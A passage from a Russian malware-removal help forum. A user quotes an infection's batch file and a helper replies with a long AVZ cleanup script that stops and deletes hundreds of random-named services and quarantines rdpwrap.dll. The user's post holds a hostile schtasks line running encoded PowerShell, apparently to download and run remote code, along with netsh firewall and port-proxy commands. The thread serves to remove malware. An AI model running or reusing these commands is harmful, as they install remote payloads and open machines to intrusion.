Показано с 1 по 13 из 13.

Десятки процессов CMD.exe и планировщика задачь (заявка № 225725)

  1. #1
    Junior Member Репутация
    Регистрация
    06.10.2020
    Сообщений
    6
    Вес репутации
    1

    Десятки процессов CMD.exe и планировщика задачь

    Добрый день. Словил вирус который создаёт десятки "процессов планировщик задач" "Обработчик команд Windows" "Console Windows Host" Постоянно генерирует службы с именем 4 рандомных буквы. Создаёт файл GoogleX.Bat Внутри которого прописана команда и судя по всему эти процессы её выполняют
    "schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "AutFree" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdA AuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBh AGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYgBpAG 4AZwAuAHAAcgBvAHQAbwBwAG8AdwBlAHIALgBpAGMAdQAvAGMA bwBrADkALgBqAHMAJwApAA==" netsh interface ipv6 install
    netsh firewall add portopening tcp 65532 DNS2
    netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53
    netsh firewall add portopening tcp 65531 DNSS2
    netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 "

    Антивирусы не хотят устанавливаться пишут ошибку. Сканеры не находят нечего криминального.
    Изображения Изображения
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,306
    Вес репутации
    360
    Уважаемый(ая) Sektor1024, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    31,789
    Вес репутации
    959
    Выполните скрипт в AVZ из папки Autologger:
    Код:
    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     StopService('aaGS');
     StopService('abhi');
     StopService('AfXk');
     StopService('AiHF');
     StopService('aKbx');
     StopService('AluR');
     StopService('AMLL');
     StopService('aMnn');
     StopService('anlA');
     StopService('AodN');
     StopService('AoEv');
     StopService('ApgS');
     StopService('ApIq');
     StopService('aQId');
     StopService('army');
     StopService('ASgL');
     StopService('aSuW');
     StopService('ATMt');
     StopService('aUAH');
     StopService('AWFs');
     StopService('awhz');
     StopService('aWrD');
     StopService('AXsr');
     StopService('AYJQ');
     StopService('AZoa');
     StopService('bdTX');
     StopService('bJIK');
     StopService('bjyh');
     StopService('bLid');
     StopService('bOYn');
     StopService('bPnS');
     StopService('bPSb');
     StopService('BpvX');
     StopService('Bqop');
     StopService('BqZN');
     StopService('bRhy');
     StopService('brtW');
     StopService('BSSb');
     StopService('bVVw');
     StopService('ByWd');
     StopService('bZfs');
     StopService('CbsO');
     StopService('ccaJ');
     StopService('ccdW');
     StopService('CCHJ');
     StopService('Cdaf');
     StopService('CgpH');
     StopService('ciLP');
     StopService('CLyY');
     StopService('cmJv');
     StopService('CmyH');
     StopService('CNVY');
     StopService('CnYl');
     StopService('CnzB');
     StopService('CpWd');
     StopService('CqPu');
     StopService('CrdT');
     StopService('CruK');
     StopService('CSuu');
     StopService('cUie');
     StopService('CUKf');
     StopService('cUvn');
     StopService('cvdk');
     StopService('CvFa');
     StopService('Cyef');
     StopService('daGU');
     StopService('DbQc');
     StopService('dCBE');
     StopService('DEeF');
     StopService('dfQL');
     StopService('dgTr');
     StopService('dJEm');
     StopService('dMRf');
     StopService('dMud');
     StopService('dnaO');
     StopService('DNLQ');
     StopService('dOgh');
     StopService('dOxq');
     StopService('dqms');
     StopService('drGy');
     StopService('DSuL');
     StopService('dsxT');
     StopService('DToV');
     StopService('DUKy');
     StopService('dvhw');
     StopService('DVwM');
     StopService('DXtq');
     StopService('DYHo');
     StopService('dYxz');
     StopService('DzYS');
     StopService('eaBy');
     StopService('eanf');
     StopService('eauE');
     StopService('eDBD');
     StopService('edKt');
     StopService('eEGw');
     StopService('EErn');
     StopService('EETJ');
     StopService('eJbm');
     StopService('Ejrw');
     StopService('EKlk');
     StopService('eKwt');
     StopService('ELlH');
     StopService('EnNh');
     StopService('EPqC');
     StopService('eQhK');
     StopService('erkp');
     StopService('ErUr');
     StopService('EsTA');
     StopService('eTCg');
     StopService('etgs');
     StopService('eVfc');
     StopService('EXQe');
     StopService('FAfG');
     StopService('faOh');
     StopService('fcqb');
     StopService('FCWt');
     StopService('fdwL');
     StopService('fECN');
     StopService('feuu');
     StopService('FGdo');
     StopService('FgXh');
     StopService('FHtx');
     StopService('fhZm');
     StopService('fkjU');
     StopService('FLOl');
     StopService('FlvH');
     StopService('FnvT');
     StopService('FPqr');
     StopService('FqDp');
     StopService('fsIg');
     StopService('fuNe');
     StopService('fVXn');
     StopService('FXbR');
     StopService('FxnN');
     StopService('FxRL');
     StopService('fXvk');
     StopService('fYAD');
     StopService('fYtH');
     StopService('Fzbw');
     StopService('FZft');
     StopService('gbXm');
     StopService('GdCY');
     StopService('gEry');
     StopService('GFZM');
     StopService('GkPO');
     StopService('GKVc');
     StopService('glaJ');
     StopService('gmOp');
     StopService('GPSj');
     StopService('gUwB');
     StopService('GvYI');
     StopService('GXEA');
     StopService('GZHC');
     StopService('haev');
     StopService('Hcah');
     StopService('hcID');
     StopService('HDPq');
     StopService('hENs');
     StopService('Heta');
     StopService('HeTf');
     StopService('HHEC');
     StopService('HhGq');
     StopService('hipZ');
     StopService('hknS');
     StopService('HliD');
     StopService('hpNe');
     StopService('hpzc');
     StopService('hQxv');
     StopService('HrNd');
     StopService('hsfS');
     StopService('huNG');
     StopService('HuvD');
     StopService('hVuE');
     StopService('hvWs');
     StopService('HwHQ');
     StopService('HXjz');
     StopService('HXsR');
     StopService('hyvJ');
     StopService('IBxf');
     StopService('iEht');
     StopService('iFNK');
     StopService('IFVq');
     StopService('IhEt');
     StopService('ihxQ');
     StopService('iiBY');
     StopService('iImB');
     StopService('IiTq');
     StopService('iKeo');
     StopService('iLIa');
     StopService('imDQ');
     StopService('imhK');
     StopService('iOIH');
     StopService('IRZc');
     StopService('iSwW');
     StopService('ivjk');
     StopService('IwTh');
     StopService('iWwc');
     StopService('IxeJ');
     StopService('ixjF');
     StopService('Ixlz');
     StopService('iZdL');
     StopService('iZUP');
     StopService('JajD');
     StopService('JCml');
     StopService('jDwb');
     StopService('jFsb');
     StopService('JgOM');
     StopService('jjJf');
     StopService('jjTS');
     StopService('jKXj');
     StopService('Jluh');
     StopService('JOcr');
     StopService('jOsJ');
     StopService('Jskx');
     StopService('JSRR');
     StopService('JTbt');
     StopService('jTKT');
     StopService('jTzP');
     StopService('jurW');
     StopService('jwJR');
     StopService('JWNA');
     StopService('kCKF');
     StopService('kCmz');
     StopService('kCqQ');
     StopService('KCrA');
     StopService('KDel');
     StopService('keGN');
     StopService('kEME');
     StopService('kEwI');
     StopService('kfxL');
     StopService('KHfP');
     StopService('KIen');
     StopService('kIpb');
     StopService('KKMs');
     StopService('kKnI');
     StopService('kkYc');
     StopService('klpE');
     StopService('kMTb');
     StopService('KnAx');
     StopService('kNUe');
     StopService('koac');
     StopService('KPtb');
     StopService('KpuR');
     StopService('kqQB');
     StopService('Kqwc');
     StopService('ksbY');
     StopService('kSLU');
     StopService('KTxG');
     StopService('kWAU');
     StopService('KyDA');
     StopService('lBcq');
     StopService('lbhH');
     StopService('LBSq');
     StopService('LcYH');
     StopService('lExx');
     StopService('LfdN');
     StopService('LfmD');
     StopService('LHPt');
     StopService('ljLy');
     StopService('lJQO');
     StopService('lLBF');
     StopService('llHG');
     StopService('LmCX');
     StopService('Lmfp');
     StopService('lnlv');
     StopService('LpFr');
     StopService('lqXl');
     StopService('LsGh');
     StopService('luYu');
     StopService('LxyS');
     StopService('LYIT');
     StopService('MAdV');
     StopService('MApA');
     StopService('mboN');
     StopService('mBtp');
     StopService('mdln');
     StopService('mdOa');
     StopService('mEJO');
     StopService('MEqK');
     StopService('mIgD');
     StopService('MISt');
     StopService('miws');
     StopService('Mllq');
     StopService('mnCH');
     StopService('Mnwl');
     StopService('mPCz');
     StopService('mPMn');
     StopService('msVb');
     StopService('MtYD');
     StopService('MuZK');
     StopService('MwkE');
     StopService('mwnU');
     StopService('MxTx');
     StopService('MyGt');
     StopService('nACK');
     StopService('nBbw');
     StopService('NbNG');
     StopService('NCbh');
     StopService('nDBY');
     StopService('NdJT');
     StopService('ndQI');
     StopService('NDyU');
     StopService('ngWs');
     StopService('nINZ');
     StopService('NJCe');
     StopService('NjcY');
     StopService('Njzo');
     StopService('nkiR');
     StopService('Nliw');
     StopService('Nmvc');
     StopService('NnGs');
     StopService('NnWW');
     StopService('nOax');
     StopService('NrpX');
     StopService('NrYe');
     StopService('nSoD');
     StopService('ntht');
     StopService('nTmt');
     StopService('nUFG');
     StopService('nUHk');
     StopService('nVRd');
     StopService('Nvyh');
     StopService('NwdO');
     StopService('nwzT');
     StopService('nyCA');
     StopService('nydA');
     StopService('nYKV');
     StopService('oAcs');
     StopService('oCRl');
     StopService('OdEK');
     StopService('oFch');
     StopService('OFGo');
     StopService('OfJd');
     StopService('OGtC');
     StopService('ohar');
     StopService('OiAQ');
     StopService('OIkr');
     StopService('OiyO');
     StopService('oLxG');
     StopService('OLYt');
     StopService('ombA');
     StopService('omoH');
     StopService('omSu');
     StopService('ooUT');
     StopService('oqof');
     StopService('ORCS');
     StopService('OuXn');
     StopService('ovcw');
     StopService('OVFd');
     StopService('oVjD');
     StopService('ovQM');
     StopService('oWnN');
     StopService('OXNY');
     StopService('OxoE');
     StopService('oZAh');
     StopService('OZbK');
     StopService('OzOi');
     StopService('OzUG');
     StopService('PbfR');
     StopService('PcAX');
     StopService('PccC');
     StopService('peHY');
     StopService('PFvs');
     StopService('pGhj');
     StopService('PGIt');
     StopService('PgMn');
     StopService('PIrR');
     StopService('pitq');
     StopService('pItx');
     StopService('pkwS');
     StopService('PMEC');
     StopService('pmQJ');
     StopService('pOlN');
     StopService('POpy');
     StopService('poXB');
     StopService('PoZJ');
     StopService('PPpT');
     StopService('PqJc');
     StopService('pQVR');
     StopService('PRfy');
     StopService('PrPv');
     StopService('Prvw');
     StopService('PsTK');
     StopService('PtRI');
     StopService('PuEG');
     StopService('puIW');
     StopService('PUNt');
     StopService('PuoC');
     StopService('pUtY');
     StopService('PXDw');
     StopService('pxMg');
     StopService('PXqm');
     StopService('pXxd');
     StopService('PXYC');
     StopService('pYXX');
     StopService('PztL');
     StopService('QBdh');
     StopService('qbDu');
     StopService('QbNP');
     StopService('qewt');
     StopService('qgBR');
     StopService('Qhnc');
     StopService('QJnR');
     StopService('QjYy');
     StopService('qkXT');
     StopService('qMfS');
     StopService('qNTu');
     StopService('Qotq');
     StopService('qpTo');
     StopService('qRiZ');
     StopService('QtkM');
     StopService('QuNS');
     StopService('QuUV');
     StopService('QuVC');
     StopService('Qvgl');
     StopService('QvLR');
     StopService('QWFk');
     StopService('QwPN');
     StopService('Qxtv');
     StopService('RAAG');
     StopService('RaGL');
     StopService('rAOS');
     StopService('raTM');
     StopService('RbHP');
     StopService('RcDa');
     StopService('RCHO');
     StopService('rDTA');
     StopService('REPJ');
     StopService('rhdk');
     StopService('Rjbg');
     StopService('rlAo');
     StopService('rLqN');
     StopService('roDW');
     StopService('ROmf');
     StopService('rOWm');
     StopService('Rqgj');
     StopService('RQqP');
     StopService('rQYY');
     StopService('rrvD');
     StopService('rtCg');
     StopService('RTMu');
     StopService('rUdN');
     StopService('rveN');
     StopService('rVfG');
     StopService('rvlX');
     StopService('rVsf');
     StopService('RWeb');
     StopService('RwGR');
     StopService('RxCt');
     StopService('RxOL');
     StopService('Rxuj');
     StopService('RZgQ');
     StopService('rzit');
     StopService('RZLi');
     StopService('SANL');
     StopService('SAtS');
     StopService('sAyi');
     StopService('SCcg');
     StopService('sdcn');
     StopService('sDOl');
     StopService('SEnc');
     StopService('SERm');
     StopService('SHiS');
     StopService('shsz');
     StopService('sJKj');
     StopService('sjoT');
     StopService('SmeQ');
     StopService('SmIB');
     StopService('SnBQ');
     StopService('snbZ');
     StopService('sNiO');
     StopService('SoFh');
     StopService('spaX');
     StopService('Spmp');
     StopService('SPOm');
     StopService('SRaD');
     StopService('SRZG');
     StopService('sRzz');
     StopService('suHV');
     StopService('sUKn');
     StopService('SvEO');
     StopService('SVhp');
     StopService('sVqh');
     StopService('SwWe');
     StopService('SXnK');
     StopService('SZAu');
     StopService('tArC');
     StopService('teAq');
     StopService('TeZi');
     StopService('tfia');
     StopService('TfkV');
     StopService('tfsh');
     StopService('thCj');
     StopService('thgP');
     StopService('tivm');
     StopService('TIyM');
     StopService('TkbM');
     StopService('tKnj');
     StopService('TMkz');
     StopService('Toif');
     StopService('TQMU');
     StopService('ttXX');
     StopService('TurV');
     StopService('tvym');
     StopService('TWfY');
     StopService('TwqB');
     StopService('TWzz');
     StopService('TXcs');
     StopService('Tzov');
     StopService('uCMV');
     StopService('uEhY');
     StopService('UEjH');
     StopService('UGmp');
     StopService('UhZf');
     StopService('uiMw');
     StopService('UiOZ');
     StopService('UiRW');
     StopService('uIZB');
     StopService('UJdZ');
     StopService('ulhy');
     StopService('uLqf');
     StopService('UmhJ');
     StopService('umIz');
     StopService('uMrz');
     StopService('uNsj');
     StopService('uNXN');
     StopService('uoae');
     StopService('UoFS');
     StopService('uoLx');
     StopService('UOZp');
     StopService('UQSR');
     StopService('utUh');
     StopService('uxNA');
     StopService('uYpc');
     StopService('ValP');
     StopService('VAMF');
     StopService('vaVc');
     StopService('VBLM');
     StopService('Vdff');
     StopService('vDjA');
     StopService('vDQv');
     StopService('vEYK');
     StopService('VHTa');
     StopService('VihC');
     StopService('vjdm');
     StopService('vJfb');
     StopService('Vkms');
     StopService('vlbs');
     StopService('VMPf');
     StopService('vMRy');
     StopService('voom');
     StopService('VQgW');
     StopService('vrBj');
     StopService('VSRa');
     StopService('vsrh');
     StopService('VTwz');
     StopService('vUri');
     StopService('vvdG');
     StopService('vvdJ');
     StopService('vwxi');
     StopService('VYSq');
     StopService('WAGy');
     StopService('wAua');
     StopService('WbEi');
     StopService('WbOw');
     StopService('WCfP');
     StopService('wCIG');
     StopService('Wdhm');
     StopService('wDVc');
     StopService('WfxE');
     StopService('wFxP');
     StopService('wgBd');
     StopService('Wjwz');
     StopService('wkDx');
     StopService('WlCO');
     StopService('wmHm');
     StopService('wMrw');
     StopService('wonm');
     StopService('wpRK');
     StopService('WSEe');
     StopService('wtgX');
     StopService('WTzV');
     StopService('WuLQ');
     StopService('wUwV');
     StopService('WVel');
     StopService('WWvD');
     StopService('WxTn');
     StopService('wXUF');
     StopService('wXWl');
     StopService('wZtm');
     StopService('XaLt');
     StopService('XBcg');
     StopService('XDTO');
     StopService('xEtp');
     StopService('XeXx');
     StopService('xFnh');
     StopService('xgga');
     StopService('xhJw');
     StopService('xHUx');
     StopService('XJki');
     StopService('XkTx');
     StopService('Xliw');
     StopService('XmzQ');
     StopService('xnwl');
     StopService('XpiQ');
     StopService('XpLJ');
     StopService('xqsn');
     StopService('XraU');
     StopService('XtcV');
     StopService('xTOk');
     StopService('XVwL');
     StopService('xWaV');
     StopService('XWbd');
     StopService('xWEf');
     StopService('XYUK');
     StopService('xzcJ');
     StopService('YbBJ');
     StopService('ybyQ');
     StopService('YCGT');
     StopService('YcTA');
     StopService('yFMa');
     StopService('yfsF');
     StopService('YFuB');
     StopService('ygbC');
     StopService('YGHG');
     StopService('YgYt');
     StopService('yJth');
     StopService('yKBO');
     StopService('ykmR');
     StopService('YLyz');
     StopService('yOod');
     StopService('yOsz');
     StopService('YrfH');
     StopService('ytRT');
     StopService('YtSQ');
     StopService('YwAz');
     StopService('YWsT');
     StopService('zAqY');
     StopService('zbdb');
     StopService('zDVX');
     StopService('zehI');
     StopService('zgCj');
     StopService('zNHc');
     StopService('ZOxu');
     StopService('ZQDg');
     StopService('zrFb');
     StopService('ZShG');
     StopService('zSnC');
     StopService('ZuAs');
     StopService('ZUIe');
     StopService('ZWTd');
     StopService('zWTe');
     StopService('zYpO');
     StopService('ZZmI');
     StopService('ZZQG');
     QuarantineFile('C:\Program Files\rdp wrapper\rdpwrap.dll', '');
     QuarantineFile('c:\windows\temp\GoogleX.bat', '');
     DeleteFile('>>c:\windows\temp\GoogleX.bat&cmd.exe', '64');
     DeleteFile('C:\Program Files\rdp wrapper\rdpwrap.dll', '');
     DeleteService('aaGS');
     DeleteService('abhi');
     DeleteService('AfXk');
     DeleteService('AiHF');
     DeleteService('aKbx');
     DeleteService('AluR');
     DeleteService('AMLL');
     DeleteService('aMnn');
     DeleteService('anlA');
     DeleteService('AodN');
     DeleteService('AoEv');
     DeleteService('ApgS');
     DeleteService('ApIq');
     DeleteService('aQId');
     DeleteService('army');
     DeleteService('ASgL');
     DeleteService('aSuW');
     DeleteService('ATMt');
     DeleteService('aUAH');
     DeleteService('AWFs');
     DeleteService('awhz');
     DeleteService('aWrD');
     DeleteService('AXsr');
     DeleteService('AYJQ');
     DeleteService('AZoa');
     DeleteService('bdTX');
     DeleteService('bJIK');
     DeleteService('bjyh');
     DeleteService('bLid');
     DeleteService('bOYn');
     DeleteService('bPnS');
     DeleteService('bPSb');
     DeleteService('BpvX');
     DeleteService('Bqop');
     DeleteService('BqZN');
     DeleteService('bRhy');
     DeleteService('brtW');
     DeleteService('BSSb');
     DeleteService('bVVw');
     DeleteService('ByWd');
     DeleteService('bZfs');
     DeleteService('CbsO');
     DeleteService('ccaJ');
     DeleteService('ccdW');
     DeleteService('CCHJ');
     DeleteService('Cdaf');
     DeleteService('CgpH');
     DeleteService('ciLP');
     DeleteService('CLyY');
     DeleteService('cmJv');
     DeleteService('CmyH');
     DeleteService('CNVY');
     DeleteService('CnYl');
     DeleteService('CnzB');
     DeleteService('CpWd');
     DeleteService('CqPu');
     DeleteService('CrdT');
     DeleteService('CruK');
     DeleteService('CSuu');
     DeleteService('cUie');
     DeleteService('CUKf');
     DeleteService('cUvn');
     DeleteService('cvdk');
     DeleteService('CvFa');
     DeleteService('Cyef');
     DeleteService('daGU');
     DeleteService('DbQc');
     DeleteService('dCBE');
     DeleteService('DEeF');
     DeleteService('dfQL');
     DeleteService('dgTr');
     DeleteService('dJEm');
     DeleteService('dMRf');
     DeleteService('dMud');
     DeleteService('dnaO');
     DeleteService('DNLQ');
     DeleteService('dOgh');
     DeleteService('dOxq');
     DeleteService('dqms');
     DeleteService('drGy');
     DeleteService('DSuL');
     DeleteService('dsxT');
     DeleteService('DToV');
     DeleteService('DUKy');
     DeleteService('dvhw');
     DeleteService('DVwM');
     DeleteService('DXtq');
     DeleteService('DYHo');
     DeleteService('dYxz');
     DeleteService('DzYS');
     DeleteService('eaBy');
     DeleteService('eanf');
     DeleteService('eauE');
     DeleteService('eDBD');
     DeleteService('edKt');
     DeleteService('eEGw');
     DeleteService('EErn');
     DeleteService('EETJ');
     DeleteService('eJbm');
     DeleteService('Ejrw');
     DeleteService('EKlk');
     DeleteService('eKwt');
     DeleteService('ELlH');
     DeleteService('EnNh');
     DeleteService('EPqC');
     DeleteService('eQhK');
     DeleteService('erkp');
     DeleteService('ErUr');
     DeleteService('EsTA');
     DeleteService('eTCg');
     DeleteService('etgs');
     DeleteService('eVfc');
     DeleteService('EXQe');
     DeleteService('FAfG');
     DeleteService('faOh');
     DeleteService('fcqb');
     DeleteService('FCWt');
     DeleteService('fdwL');
     DeleteService('fECN');
     DeleteService('feuu');
     DeleteService('FGdo');
     DeleteService('FgXh');
     DeleteService('FHtx');
     DeleteService('fhZm');
     DeleteService('fkjU');
     DeleteService('FLOl');
     DeleteService('FlvH');
     DeleteService('FnvT');
     DeleteService('FPqr');
     DeleteService('FqDp');
     DeleteService('fsIg');
     DeleteService('fuNe');
     DeleteService('fVXn');
     DeleteService('FXbR');
     DeleteService('FxnN');
     DeleteService('FxRL');
     DeleteService('fXvk');
     DeleteService('fYAD');
     DeleteService('fYtH');
     DeleteService('Fzbw');
     DeleteService('FZft');
     DeleteService('gbXm');
     DeleteService('GdCY');
     DeleteService('gEry');
     DeleteService('GFZM');
     DeleteService('GkPO');
     DeleteService('GKVc');
     DeleteService('glaJ');
     DeleteService('gmOp');
     DeleteService('GPSj');
     DeleteService('gUwB');
     DeleteService('GvYI');
     DeleteService('GXEA');
     DeleteService('GZHC');
     DeleteService('haev');
     DeleteService('Hcah');
     DeleteService('hcID');
     DeleteService('HDPq');
     DeleteService('hENs');
     DeleteService('Heta');
     DeleteService('HeTf');
     DeleteService('HHEC');
     DeleteService('HhGq');
     DeleteService('hipZ');
     DeleteService('hknS');
     DeleteService('HliD');
     DeleteService('hpNe');
     DeleteService('hpzc');
     DeleteService('hQxv');
     DeleteService('HrNd');
     DeleteService('hsfS');
     DeleteService('huNG');
     DeleteService('HuvD');
     DeleteService('hVuE');
     DeleteService('hvWs');
     DeleteService('HwHQ');
     DeleteService('HXjz');
     DeleteService('HXsR');
     DeleteService('hyvJ');
     DeleteService('IBxf');
     DeleteService('iEht');
     DeleteService('iFNK');
     DeleteService('IFVq');
     DeleteService('IhEt');
     DeleteService('ihxQ');
     DeleteService('iiBY');
     DeleteService('iImB');
     DeleteService('IiTq');
     DeleteService('iKeo');
     DeleteService('iLIa');
     DeleteService('imDQ');
     DeleteService('imhK');
     DeleteService('iOIH');
     DeleteService('IRZc');
     DeleteService('iSwW');
     DeleteService('ivjk');
     DeleteService('IwTh');
     DeleteService('iWwc');
     DeleteService('IxeJ');
     DeleteService('ixjF');
     DeleteService('Ixlz');
     DeleteService('iZdL');
     DeleteService('iZUP');
     DeleteService('JajD');
     DeleteService('JCml');
     DeleteService('jDwb');
     DeleteService('jFsb');
     DeleteService('JgOM');
     DeleteService('jjJf');
     DeleteService('jjTS');
     DeleteService('jKXj');
     DeleteService('Jluh');
     DeleteService('JOcr');
     DeleteService('jOsJ');
     DeleteService('Jskx');
     DeleteService('JSRR');
     DeleteService('JTbt');
     DeleteService('jTKT');
     DeleteService('jTzP');
     DeleteService('jurW');
     DeleteService('jwJR');
     DeleteService('JWNA');
     DeleteService('kCKF');
     DeleteService('kCmz');
     DeleteService('kCqQ');
     DeleteService('KCrA');
     DeleteService('KDel');
     DeleteService('keGN');
     DeleteService('kEME');
     DeleteService('kEwI');
     DeleteService('kfxL');
     DeleteService('KHfP');
     DeleteService('KIen');
     DeleteService('kIpb');
     DeleteService('KKMs');
     DeleteService('kKnI');
     DeleteService('kkYc');
     DeleteService('klpE');
     DeleteService('kMTb');
     DeleteService('KnAx');
     DeleteService('kNUe');
     DeleteService('koac');
     DeleteService('KPtb');
     DeleteService('KpuR');
     DeleteService('kqQB');
     DeleteService('Kqwc');
     DeleteService('ksbY');
     DeleteService('kSLU');
     DeleteService('KTxG');
     DeleteService('kWAU');
     DeleteService('KyDA');
     DeleteService('lBcq');
     DeleteService('lbhH');
     DeleteService('LBSq');
     DeleteService('LcYH');
     DeleteService('lExx');
     DeleteService('LfdN');
     DeleteService('LfmD');
     DeleteService('LHPt');
     DeleteService('ljLy');
     DeleteService('lJQO');
     DeleteService('lLBF');
     DeleteService('llHG');
     DeleteService('LmCX');
     DeleteService('Lmfp');
     DeleteService('lnlv');
     DeleteService('LpFr');
     DeleteService('lqXl');
     DeleteService('LsGh');
     DeleteService('luYu');
     DeleteService('LxyS');
     DeleteService('LYIT');
     DeleteService('MAdV');
     DeleteService('MApA');
     DeleteService('mboN');
     DeleteService('mBtp');
     DeleteService('mdln');
     DeleteService('mdOa');
     DeleteService('mEJO');
     DeleteService('MEqK');
     DeleteService('mIgD');
     DeleteService('MISt');
     DeleteService('miws');
     DeleteService('Mllq');
     DeleteService('mnCH');
     DeleteService('Mnwl');
     DeleteService('mPCz');
     DeleteService('mPMn');
     DeleteService('msVb');
     DeleteService('MtYD');
     DeleteService('MuZK');
     DeleteService('MwkE');
     DeleteService('mwnU');
     DeleteService('MxTx');
     DeleteService('MyGt');
     DeleteService('nACK');
     DeleteService('nBbw');
     DeleteService('NbNG');
     DeleteService('NCbh');
     DeleteService('nDBY');
     DeleteService('NdJT');
     DeleteService('ndQI');
     DeleteService('NDyU');
     DeleteService('ngWs');
     DeleteService('nINZ');
     DeleteService('NJCe');
     DeleteService('NjcY');
     DeleteService('Njzo');
     DeleteService('nkiR');
     DeleteService('Nliw');
     DeleteService('Nmvc');
     DeleteService('NnGs');
     DeleteService('NnWW');
     DeleteService('nOax');
     DeleteService('NrpX');
     DeleteService('NrYe');
     DeleteService('nSoD');
     DeleteService('ntht');
     DeleteService('nTmt');
     DeleteService('nUFG');
     DeleteService('nUHk');
     DeleteService('nVRd');
     DeleteService('Nvyh');
     DeleteService('NwdO');
     DeleteService('nwzT');
     DeleteService('nyCA');
     DeleteService('nydA');
     DeleteService('nYKV');
     DeleteService('oAcs');
     DeleteService('oCRl');
     DeleteService('OdEK');
     DeleteService('oFch');
     DeleteService('OFGo');
     DeleteService('OfJd');
     DeleteService('OGtC');
     DeleteService('ohar');
     DeleteService('OiAQ');
     DeleteService('OIkr');
     DeleteService('OiyO');
     DeleteService('oLxG');
     DeleteService('OLYt');
     DeleteService('ombA');
     DeleteService('omoH');
     DeleteService('omSu');
     DeleteService('ooUT');
     DeleteService('oqof');
     DeleteService('ORCS');
     DeleteService('OuXn');
     DeleteService('ovcw');
     DeleteService('OVFd');
     DeleteService('oVjD');
     DeleteService('ovQM');
     DeleteService('oWnN');
     DeleteService('OXNY');
     DeleteService('OxoE');
     DeleteService('oZAh');
     DeleteService('OZbK');
     DeleteService('OzOi');
     DeleteService('OzUG');
     DeleteService('PbfR');
     DeleteService('PcAX');
     DeleteService('PccC');
     DeleteService('peHY');
     DeleteService('PFvs');
     DeleteService('pGhj');
     DeleteService('PGIt');
     DeleteService('PgMn');
     DeleteService('PIrR');
     DeleteService('pitq');
     DeleteService('pItx');
     DeleteService('pkwS');
     DeleteService('PMEC');
     DeleteService('pmQJ');
     DeleteService('pOlN');
     DeleteService('POpy');
     DeleteService('poXB');
     DeleteService('PoZJ');
     DeleteService('PPpT');
     DeleteService('PqJc');
     DeleteService('pQVR');
     DeleteService('PRfy');
     DeleteService('PrPv');
     DeleteService('Prvw');
     DeleteService('PsTK');
     DeleteService('PtRI');
     DeleteService('PuEG');
     DeleteService('puIW');
     DeleteService('PUNt');
     DeleteService('PuoC');
     DeleteService('pUtY');
     DeleteService('PXDw');
     DeleteService('pxMg');
     DeleteService('PXqm');
     DeleteService('pXxd');
     DeleteService('PXYC');
     DeleteService('pYXX');
     DeleteService('PztL');
     DeleteService('QBdh');
     DeleteService('qbDu');
     DeleteService('QbNP');
     DeleteService('qewt');
     DeleteService('qgBR');
     DeleteService('Qhnc');
     DeleteService('QJnR');
     DeleteService('QjYy');
     DeleteService('qkXT');
     DeleteService('qMfS');
     DeleteService('qNTu');
     DeleteService('Qotq');
     DeleteService('qpTo');
     DeleteService('qRiZ');
     DeleteService('QtkM');
     DeleteService('QuNS');
     DeleteService('QuUV');
     DeleteService('QuVC');
     DeleteService('Qvgl');
     DeleteService('QvLR');
     DeleteService('QWFk');
     DeleteService('QwPN');
     DeleteService('Qxtv');
     DeleteService('RAAG');
     DeleteService('RaGL');
     DeleteService('rAOS');
     DeleteService('raTM');
     DeleteService('RbHP');
     DeleteService('RcDa');
     DeleteService('RCHO');
     DeleteService('rDTA');
     DeleteService('REPJ');
     DeleteService('rhdk');
     DeleteService('Rjbg');
     DeleteService('rlAo');
     DeleteService('rLqN');
     DeleteService('roDW');
     DeleteService('ROmf');
     DeleteService('rOWm');
     DeleteService('Rqgj');
     DeleteService('RQqP');
     DeleteService('rQYY');
     DeleteService('rrvD');
     DeleteService('rtCg');
     DeleteService('RTMu');
     DeleteService('rUdN');
     DeleteService('rveN');
     DeleteService('rVfG');
     DeleteService('rvlX');
     DeleteService('rVsf');
     DeleteService('RWeb');
     DeleteService('RwGR');
     DeleteService('RxCt');
     DeleteService('RxOL');
     DeleteService('Rxuj');
     DeleteService('RZgQ');
     DeleteService('rzit');
     DeleteService('RZLi');
     DeleteService('SANL');
     DeleteService('SAtS');
     DeleteService('sAyi');
     DeleteService('SCcg');
     DeleteService('sdcn');
     DeleteService('sDOl');
     DeleteService('SEnc');
     DeleteService('SERm');
     DeleteService('SHiS');
     DeleteService('shsz');
     DeleteService('sJKj');
     DeleteService('sjoT');
     DeleteService('SmeQ');
     DeleteService('SmIB');
     DeleteService('SnBQ');
     DeleteService('snbZ');
     DeleteService('sNiO');
     DeleteService('SoFh');
     DeleteService('spaX');
     DeleteService('Spmp');
     DeleteService('SPOm');
     DeleteService('SRaD');
     DeleteService('SRZG');
     DeleteService('sRzz');
     DeleteService('suHV');
     DeleteService('sUKn');
     DeleteService('SvEO');
     DeleteService('SVhp');
     DeleteService('sVqh');
     DeleteService('SwWe');
     DeleteService('SXnK');
     DeleteService('SZAu');
     DeleteService('tArC');
     DeleteService('teAq');
     DeleteService('TeZi');
